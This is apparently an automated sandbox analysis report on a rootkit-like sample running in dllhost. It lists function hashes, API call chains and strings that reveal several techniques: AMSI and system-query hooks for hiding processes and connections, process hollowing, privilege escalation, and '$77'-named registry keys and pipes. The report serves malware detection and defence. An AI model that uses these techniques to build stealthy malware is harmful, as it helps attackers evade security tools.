• Instruction ID: 10f202612f1e6d5b25c2a2b6f529799c2360b0dca5b81425742e23b4f8d9878f
• Opcode Fuzzy Hash: a68e9f442f763d15fcbf828a4bdd41b84938c378905df83764973d8e7f96681c
• Instruction Fuzzy Hash: 5B515AB27116808AEB66DF63F8587EA22A1F78DBD4F404125EF4A477A4DF38C586C704

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
• Opcode ID: 949f16e7d4c180cf813de136aa23d71ac300c489f72f878ece3ea1172fb87a5a
• Instruction ID: 989d2f77f0050e3192d67e688ebe3d96c03aaae47e0f3c15b79fdd16399e6715
• Opcode Fuzzy Hash: 949f16e7d4c180cf813de136aa23d71ac300c489f72f878ece3ea1172fb87a5a
• Instruction Fuzzy Hash: AA3169B2214691CAE761CF25F4807DE7BA4F748798F40422AFB5947EA8DB78C209CB44

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
• String ID: .text$C:\Windows\System32\
• API String ID: 2721474350-832442975
• Opcode ID: 1e07da0921621d3d0947f0c2c8c44ecdff1a4ad4df37a11abb14209e036db73c
• Instruction ID: 5162005ac8c22fef71f76ecc2651d04e2d698091113972baa1bb0e356fae301c
• Opcode Fuzzy Hash: 1e07da0921621d3d0947f0c2c8c44ecdff1a4ad4df37a11abb14209e036db73c
• Instruction Fuzzy Hash: 42517DB270469086EB26DF12F8987DA73A1F78CBD5F444115AF4A03B68DF38D549C704

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
• String ID: M$\\.\pipe\$77childproc
• API String ID: 2203880229-1625420002
• Opcode ID: a1333788beb70ef34279765abebea06e3bf6a99c940ab4b4adb7949838a3b605
• Instruction ID: 9f82adc9a2da82afc58c775828db64e338728d842b3173e1d6fe9be184669719
• Opcode Fuzzy Hash: a1333788beb70ef34279765abebea06e3bf6a99c940ab4b4adb7949838a3b605
• Instruction Fuzzy Hash: 4D1115F121868482E716DB22F8143E9A764E78DBE1F548225BB9A476F5CF7CC548C704

Control-flow Graph
• Figure: function 140002d40-140002dc5; basic blocks call ConnectNamedPipe, ReadFile, DisconnectNamedPipe, Sleep and the internal function 140002390 (block-edge listing omitted)
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
• String ID: \\.\pipe\$77control
• API String ID: 2071455217-1133490114
• Opcode ID: 36dc111bbaa2474e07b1118d52b476a4b229aafa6fd9f4c6e11ccae6477e241e
• Instruction ID: 7c3f5ec425dc5f008f2f9d970d4da03b913dd07842e93ae30d277d2745604383
• Opcode Fuzzy Hash: 36dc111bbaa2474e07b1118d52b476a4b229aafa6fd9f4c6e11ccae6477e241e
• Instruction Fuzzy Hash: E3015AB0210600C2EB16DB23F8143EA63A1B79DBE1F544226FB66432F5CF78C848C704

Control-flow Graph
• Figure: function 1400036c4-140003780; basic blocks call GetProcessHeap, HeapAlloc, K32EnumProcesses, SleepEx and the internal function 140003220 (block-edge listing omitted)
APIs
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$AllocProcess$EnumProcessesSleep
• String ID:
• API String ID: 3676546796-0
• Opcode ID: 2063ebf49b69ed3c1b9805c902a12b428771fdbf7bbf74ecde5daa0ba9b34b01
• Instruction ID: 22731a8b42674325a47caa94babb191afd8e106128d15b43582e5fd179edb77c
• Opcode Fuzzy Hash: 2063ebf49b69ed3c1b9805c902a12b428771fdbf7bbf74ecde5daa0ba9b34b01
• Instruction Fuzzy Hash: BE116DF270465186E72ADB27F8547AA76A6F789FC1F554028EB4607B78CF39D880CB40

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
• String ID:
• API String ID: 1323846700-0
• Opcode ID: 1b8020be0153ac8c4c871f4fed511265f4a549556a39957e5e637fb536768786
• Instruction ID: ef2f834ef75e5b790356348e68605b6cc29ab2bdc5fc913e3c420dca79cf92ea
• Opcode Fuzzy Hash: 1b8020be0153ac8c4c871f4fed511265f4a549556a39957e5e637fb536768786
• Instruction Fuzzy Hash: 79115EB1B05A4086EB16DF27F8443D967A1AB9DBC4F488024FF0903776EE38C5868704

Control-flow Graph
• Figure: function 290edd0f358-290edd0f45f; basic blocks call GetStdHandle and GetFileType (block-edge listing omitted)
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: a864622e814d0c676a636131f9f06b8113cf47aa5893946a4f8a8d78e681d1d2
• Instruction ID: d9c6dbd26d9c929a836c36f306744989a70f434378b685db5c14b089fef93e2f
• Opcode Fuzzy Hash: a864622e814d0c676a636131f9f06b8113cf47aa5893946a4f8a8d78e681d1d2
• Instruction Fuzzy Hash: 8B31E822A18B4D96E7608B2595C83697655FB85BB0F791B09DFEA073E0CB34D4A1C300
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000003.1687327537.00000290EDB00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000290EDB00000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_6_3_290edb00000_dllhost.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction ID: 4fdde6dd451327623d40f7483815b36331a2f6b417c54a79c6c642078b11d019
                                                                                                                                  • Opcode Fuzzy Hash: dbf631b01d922bf85625c67df28bfff86a642957146a4ef27c224eb87c1a85be
                                                                                                                                  • Instruction Fuzzy Hash: 62912A7AB01158CBDB648F25D288B6EB393FF54BD8F5485349F890BB88EA34D816C710

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 220 140002dc8-140002dcc call 140002ddc 222 140002dd1-140002dd3 ExitProcess 220->222
APIs
  • Part of subcall function 0000000140002DDC: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E04
  • Part of subcall function 0000000140002DDC: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E14
  • Part of subcall function 0000000140002DDC: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E2E
  • Part of subcall function 0000000140002DDC: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002E45
  • Part of subcall function 0000000140002DDC: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E7D
  • Part of subcall function 0000000140002DDC: GetLastError.KERNEL32 ref: 0000000140002E87
  • Part of subcall function 0000000140002DDC: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002E90
  • Part of subcall function 0000000140002DDC: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002EB9
  • Part of subcall function 0000000140002DDC: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002EE9
  • Part of subcall function 0000000140002DDC: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F19
  • Part of subcall function 0000000140002DDC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F2D
  • Part of subcall function 0000000140002DDC: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F3B
  • Part of subcall function 0000000140002DDC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F4E
  • Part of subcall function 0000000140002DDC: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002DD1), ref: 0000000140002F5C
• ExitProcess.KERNEL32 ref: 0000000140002DD3
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
• String ID:
• API String ID: 2472495637-0
• Opcode ID: 4e5166c27edff44e2511a71d21a686f8aa291c754b9d550bcaef5bcd3ab9f41f
• Instruction ID: 09ff1b9b0b6de5b1d9dbee08bd3359a49ea0c6279bea98f9fafefd03efbcb20f
• Opcode Fuzzy Hash: 4e5166c27edff44e2511a71d21a686f8aa291c754b9d550bcaef5bcd3ab9f41f
• Instruction Fuzzy Hash: 91A002F0F2194486EB4AB7B7B85A3DC21B59BACB81F110416B206472B3DE3C48D68759

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 331 140003260-140003281 332 140003287 331->332 333 140003479-14000347f 331->333 334 1400033e7-14000341f GetProcessHeap HeapAlloc K32EnumProcesses 332->334 335 14000328d-140003293 332->335 336 1400035f5-140003619 ReadFile 333->336 337 140003485-140003488 333->337 340 1400036ae-1400036c0 334->340 344 140003425-140003436 334->344 338 140003299-14000329c 335->338 339 1400033de-1400033e0 ExitProcess 335->339 336->340 341 14000361f-140003626 336->341 342 1400035eb-1400035f0 call 14000200c 337->342 343 14000348e-140003494 337->343 346 1400032a2-1400032a5 338->346 347 140003346-140003371 RegOpenKeyExW 338->347 341->340 348 14000362c-140003667 GetProcessHeap HeapAlloc call 140001d80 341->348 342->340 349 14000349a-14000349d 343->349 350 140003590-1400035a3 call 14000218c 343->350 344->340 351 14000343c-140003472 call 140001868 * 2 344->351 353 140003337-140003341 346->353 354 1400032ab-1400032ae 346->354 359 140003373-1400033a9 RegDeleteValueW * 3 347->359 360 1400033af-1400033d9 call 14000220c * 2 call 14000200c call 1400017a8 call 14000209c 347->360 374 140003669-14000366f 348->374 375 14000369a-1400036a8 GetProcessHeap HeapFree 348->375 356 1400034dc-1400034ed call 14000218c 349->356 357 14000349f-1400034a5 349->357 350->340 377 1400035a9-1400035b8 call 14000218c 350->377 386 140003474 351->386 353->340 364 14000332a-140003332 354->364 365 1400032b0-1400032b6 354->365 356->340 378 1400034f3-140003515 ReadFile 356->378 357->340 367 1400034ab-1400034d5 call 140002cec call 140002d18 ExitProcess 357->367 359->360 360->340 364->340 365->340 373 1400032bc-1400032e0 ReadFile 365->373 373->340 381 1400032e6-1400032ed 373->381 374->375 382 140003671-140003683 374->382 375->340 377->340 399 1400035be-1400035e6 ShellExecuteW 377->399 378->340 385 14000351b-140003522 378->385 381->340 388 1400032f3-140003325 call 140001868 * 2 381->388 389 140003685-140003687 382->389 390 140003689-140003691 382->390 385->340 393 140003528-140003566 GetProcessHeap HeapAlloc ReadFile 385->393 386->340 388->340 389->390 396 140003695 call 140001f7c 389->396 390->382 397 140003693 390->397 393->375 400 14000356c-140003578 393->400 396->375 397->375 399->340 400->375 404 14000357e-14000358b call 1400024c4 400->404 404->375
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeImageLastPathProcessesQueryReadWow64lstrlen
• String ID: $77dll32$$77dll64$$77stager$$77svc32$$77svc64$SOFTWARE$open
• API String ID: 2769840798-3060126615
• Opcode ID: 29c153e1715fe07f47105540688353f685aa26b59e035f4fd9df2addc5bbf680
• Instruction ID: c7823c3da21ac714639afdafe330c24a46c95b71a711037eec7bf8ea8e14e205
• Opcode Fuzzy Hash: 29c153e1715fe07f47105540688353f685aa26b59e035f4fd9df2addc5bbf680
• Instruction Fuzzy Hash: 8FB118F1214A8196EB7BDF27F8543E923A9F7897C4F408116BB0A47AB9DF398605C701
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
• String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
• API String ID: 1036100660-1371749706
• Opcode ID: 68291d7602cf7908561aa6de77c090830a4c2d77d468ef80d8c206617ccbe223
• Instruction ID: 0d953b453a7ccc827914765d8e6f66035b70b324b962251ad8a05cdcd083286d
• Opcode Fuzzy Hash: 68291d7602cf7908561aa6de77c090830a4c2d77d468ef80d8c206617ccbe223
• Instruction Fuzzy Hash: D1D13BB2304A8187EB65CF63F84479AB7A1F788BC8F044025EB8A57BA4DF78D555CB04
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: ff4126b3c9a217e75168e29ba5c6ce306ab8e03ba8bc4bb8c5660df2a6a1b84b
• Instruction ID: 9dfe64d658352555665290a27f53dd6e0bb04f4a6149878949c37a62fff048fe
• Opcode Fuzzy Hash: ff4126b3c9a217e75168e29ba5c6ce306ab8e03ba8bc4bb8c5660df2a6a1b84b
• Instruction Fuzzy Hash: D65138B2604B8086EB56DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: lstrlen$FileHandleNameProcess$AddressCloseFindImageModuleOpenPathProc
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 3153948470-3850299575
• Opcode ID: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
• Instruction ID: 8d76f19b15ef80c2c76533e88aa87a1e1fbd472d17141bfec91230901297ad3d
• Opcode Fuzzy Hash: 529c42e0c3e19b5ffff77d56677888c3f372f3644836fe90b5fee98ec7436d17
• Instruction Fuzzy Hash: A3A10872A197988AEB64CF26C588769B7A6FF84B84F009816EE8D53794DF35CC84C340
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
• Instruction ID: 76f1b76557581135c53ace58c3509cb8edd5f998801ed0647c9094a62feece94
• Opcode Fuzzy Hash: 9e30670d31594c82338516e34ef0e2d13c32e846fbd060b69fc476bfa9e774bc
• Instruction Fuzzy Hash: A5315C72619B848AEB609F60E8C47EE7375FB84744F44482ADB8E47B98DF78C658C710
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
APIs
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID:

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2751411562.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000006.00000002.2750607335.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2752358154.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000006.00000002.2753290948.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
• String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
APIs
• GetCurrentThread.KERNEL32 ref: 00000290EDD01E43
  • Part of subcall function 00000290EDD021BC: GetModuleHandleA.KERNEL32(?,?,?,00000290EDD01E75), ref: 00000290EDD021D4
  • Part of subcall function 00000290EDD021BC: GetProcAddress.KERNEL32(?,?,?,00000290EDD01E75), ref: 00000290EDD021E5
  • Part of subcall function 00000290EDD06030: GetCurrentThreadId.KERNEL32 ref: 00000290EDD0606B
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: CurrentThread$AddressHandleModuleProc
• String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
• String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2773766324.00000290EDD01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000290EDD00000, based on PE: true
• Associated: 00000006.00000002.2772721409.00000290EDD00000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2774925844.00000290EDD15000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2775922137.00000290EDD20000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2776942861.00000290EDD22000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.2777980642.00000290EDD29000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_290edd00000_dllhost.jbxd
Similarity
• API ID: Heap$CounterInfoProcess$AllocFree
• String ID: \GPU Engine(*)\Running Time
APIs
Strings
Memory Dump Source
